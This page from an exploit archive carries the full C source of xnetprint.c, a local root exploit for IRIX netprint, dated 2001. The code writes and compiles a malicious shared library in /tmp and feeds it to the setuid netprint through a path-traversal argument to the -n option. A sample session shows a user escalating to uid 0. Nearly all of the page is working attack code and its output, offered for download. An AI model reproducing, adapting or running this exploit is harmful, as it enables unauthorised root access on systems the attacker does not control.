exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xnetprint.c

xnetprint.c
Posted Apr 30, 2001
Authored by vade79, realhalo | Site realhalo.org

Irix Netprint local root exploit. Exploits netprint's -n option. Tested on IRIX 6.2, but should work on other versions.

tags | exploit, local, root
systems | irix
SHA-256 | e1b15bb0206ea96a407bd99676b571620fc56bbe407ca2fe157fa97b328c6b5b

xnetprint.c

Change Mirror Download
/* (IRIX)netprint[] local root exploit, by: v9[v9@fakehalo.org].  this will
give you uid=0 on IRIX systems. this exploit simply takes advantage of
netprint's -n option to execute arbitrary code and gain elevated privileges.

example:
------------------------------------------------------------------------------
$ cc xnetprint.c -o xnetprint
$ id
uid=9(lp) gid=9(lp)
$ ./xnetprint /bin/sh
[(IRIX)netprint[] local root exploit, by: v9[v9@realhalo.org]. ]
[*] making symbols source file for netprint to execute.
[*] done, now compiling symbols source file.
[*] done, now checking to see if the symbols source compiled.
[*] done, now executing netprint.
[*] success, uid: 0, euid: 0, gid: 0, egid: 0.
# id
uid=0(root) gid=0(sys)
#
------------------------------------------------------------------------------

note: built and tested on IRIX 6.2. this often requires the uid of lp
to work correctly. though, should prove effective up to 6.4 or
higher.
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#define PATH "/usr/lib/print/netprint" /* path to exploitable program. */
#define CCPATH "/usr/bin/cc" /* path to compiler. */
#define SRCFILE "/tmp/xnetrpintso.c" /* path to temporary symbols source. */
#define SOFILE "/tmp/xnetprintso.so" /* path to compile as. */
#define FAKESOFILE "../../../../tmp/xnetprintso" /* arg to feed netprint. */
void cleanup(unsigned short i){
if(!access(SRCFILE,F_OK))
unlink(SRCFILE);
if(!access(SOFILE,F_OK))
unlink(SOFILE);
if(i)
exit(i);
}
int main(int argc,char **argv){
char *syscmd;
struct stat mod;
FILE *symbol;
printf("[(IRIX)netprint[] local root exploit, by: v9[v9@realhalo.org]. ]\n");
if(argc<2){
printf("[!] syntax: %s </path/to/program/to/exec>\n",argv[0]);
cleanup(1);
}
if(stat(PATH,&mod)){
printf("[!] failed, could not get stats on %s.\n",PATH);
cleanup(1);
}
if(mod.st_uid||!(S_ISUID&mod.st_mode)){
printf("[!] failed, %s is not setuid root.\n",PATH);
cleanup(1);
}
if(access(argv[1],X_OK)){
printf("[!] failed, %s doesn't seem to exist or is not executable.\n",
argv[1]);
cleanup(1);
}
if(access(CCPATH,X_OK)){
printf("[!] failed, %s compiler doesn't seem to exist or is not executable."
"\n",CCPATH);
cleanup(1);
}
printf("[*] making symbols source file for netprint to execute.\n");
cleanup(0);
if(!(symbol=fopen(SRCFILE,"w"))){
printf("[!] failed, could not open temporary file to write to.\n");
cleanup(1);
}
fprintf(symbol,"void OpenConn(){\n");
fprintf(symbol," seteuid(0);\n");
fprintf(symbol," setuid(0);\n");
fprintf(symbol," setegid(0);\n");
fprintf(symbol," setgid(0);\n");
fprintf(symbol," printf(\"\[*] success, uid: %%u, euid: %%u, gid: %%u, egid: "
"%%u.\\n\",getuid(),geteuid(),getgid(),getegid());\n");
fprintf(symbol," execl(\"%s\",\"%s\",0);\n",argv[1],argv[1]);
fprintf(symbol,"}\n");
fprintf(symbol,"void CloseConn(){}\n");
fprintf(symbol,"void ListPrinters(){}\n");
fprintf(symbol,"void SendJob(){}\n");
fprintf(symbol,"void CancelJob(){}\n");
fprintf(symbol,"void WaitForJob(){}\n");
fprintf(symbol,"void GetQueue(){}\n");
fprintf(symbol,"void StartTagging(){}\n");
fprintf(symbol,"void StopTagging(){}\n");
fprintf(symbol,"void Install(){}\n");
fprintf(symbol,"void IsDest(){}\n");
fclose(symbol);
printf("[*] done, now compiling symbols source file.\n");
if(!(syscmd=(char *)malloc(strlen(CCPATH)+strlen(SRCFILE)+strlen(SOFILE)+13+1)
)){
printf("[!] failed, could not allocate memory.\n");
cleanup(1);
}
sprintf(syscmd,"%s %s -shared -o %s",CCPATH,SRCFILE,SOFILE);
system(syscmd);
printf("[*] done, now checking to see if the symbols source compiled.\n");
if(access(SOFILE,R_OK)){
printf("[!] failed, symbols source was not compiled properly.\n");
cleanup(1);
}
printf("[*] done, now executing netprint.\n");
if(execl(PATH,PATH,"-n",FAKESOFILE,"-h0","-p0","0-0",0)){
printf("[!] failed, %s did not execute properly.\n",PATH);
cleanup(1);
}
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close